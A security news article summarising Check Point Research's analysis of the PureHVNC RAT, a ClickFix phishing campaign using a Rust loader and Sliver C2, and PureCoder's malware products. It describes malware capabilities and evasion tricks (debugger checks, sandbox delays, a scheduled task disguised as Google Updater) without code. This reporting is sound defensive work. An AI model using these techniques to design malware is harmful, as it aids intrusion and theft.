PureHVNC RAT: Inside the HVNC Malware and the PureCoder Ecosystem

A recent forensic investigation by Check Point Research (CPR) has shed light on the Pure malware family, a suite of malicious tools developed and sold by a threat actor known as PureCoder. The research centers on a ClickFix phishing campaign that resulted in an eight-day intrusion, where attackers deployed a Rust Loader, PureHVNC RAT, and the Sliver C2 framework to maintain persistence and steal sensitive data.

The infection chain began with fake job advertisements that redirected victims to a ClickFix phishing page. There, malicious PowerShell commands were automatically copied to the clipboard, tricking victims into executing them. If run, these commands downloaded obfuscated JavaScript files that deployed the first instance of PureHVNC RAT.

As CPR explains, “Upon visiting the malicious ClickFix website, a PowerShell command was automatically copied to their clipboard… If executed, the command downloaded and ran a malicious JavaScript file, initiating the infection chain.”

By day two, the attackers escalated by delivering a Rust-based loader that dropped another instance of PureHVNC RAT, this time using the campaign ID amazon3.

At the heart of the operation was PureHVNC RAT, a powerful remote administration tool that provides Hidden Virtual Network Computing (HVNC)—allowing attackers to remotely control infected systems without the user noticing.

The report highlights: “PureHVNC is a product of the Pure family of malicious software developed by PureCoder. The malware provides HVNC capabilities (Hidden Virtual Network Computing), which allows an attacker to control an infected machine without the session being visible to the infected user.”

PureHVNC comes equipped with an extensive plugin system supporting functions such as:

• Remote webcam and microphone access
• Keylogging and clipboard monitoring
• Reverse proxy support (HTTP & SOCKS5)
• Cryptocurrency address hijacking (BTC, ETH, LTC, XMR, etc.)
• YouTube and Twitch bots for automated ad-clicking and subscriptions
• Distributed Denial of Service (DDoS) capabilities

The investigation revealed that PureHVNC and related malware frequently pulled files from GitHub repositories directly controlled by PureCoder. This attribution was possible because commits were tied to GitHub accounts operating in the UTC+0300 timezone, corresponding to regions including Russia.

CPR notes, “Analysis confirmed that both the URLs and the associated GitHub accounts were directly linked to the developer of the Pure malware family.”

Further digging uncovered a PureRAT builder tool, which not only contained hardcoded GitHub URLs supporting malware functionalities but also featured overlapping code with PureCrypter, another PureCoder product.

PureCoder is believed to maintain a broad portfolio of malicious products, including:

• PureCrypter – A malware obfuscator.
• PureLogs – A stealer/logger.
• PureMiner – A silent cryptocurrency miner.
• Blue Loader – An advanced botnet loader.

These products are actively marketed on underground forums and Telegram channels, making them accessible to a wide range of cybercriminals.

The Rust Loader deployed during the campaign included advanced anti-analysis techniques, such as checking for debuggers, reverse-engineering tools, and Windows Defender emulator APIs. If analysis was suspected, the malware delayed execution by up to 30 minutes to evade sandbox detection.

Persistence was achieved by mimicking legitimate scheduled tasks, disguising itself as a Google Updater to remain hidden on compromised systems.

The Check Point investigation exposes not only the technical depth of PureHVNC RAT but also the larger Pure malware ecosystem fueling cybercrime operations. By linking GitHub repositories, builders, and infrastructure directly to PureCoder, researchers have illuminated the developer’s role in enabling widespread malicious activity.

Related Posts:

• New Phishing Campaign Deploys PureHVNC and Other Malware, Targets Sensitive Data
• PureHVNC RAT Spreads Through Fake Job Offers and Multi-Stage Obfuscation
• Acronis TRU Uncovers Surge in ScreenConnect Abuse with Dual-RAT Deployment
• FlashArray, FlashBlade at Risk: Pure Storage Reveals CVSS 10 Vulnerabilities